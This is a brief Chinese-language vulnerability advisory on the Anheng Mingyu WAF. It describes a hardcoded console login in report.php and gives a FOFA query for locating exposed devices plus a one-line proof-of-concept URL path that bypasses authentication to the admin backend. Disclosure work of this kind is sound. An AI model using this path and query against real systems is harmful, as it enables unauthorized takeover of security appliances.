Nx01 產品簡介

????????安恒明御WEB應用防火墻（簡稱WAF）是杭州安恒信息技術股份有限公司自主研發的一款專業應用安全防護產品，專注于為網站、APP等Web業務系統提供安全防護。

Nx02 漏洞描述

????????安恒明御WEB應用防火墻report.php文件存在硬編碼設置的Console用戶登錄，攻擊者可以通過漏洞直接登錄后臺。

Nx03 產品主頁

fofa-query: app="安恒信息-明御WAF"

Nx04 漏洞復現

POC：

/report.m?a=rpc-timed

返回主頁面后即可登錄后臺。

Nx05 修復建議

建議聯系軟件廠商進行處理。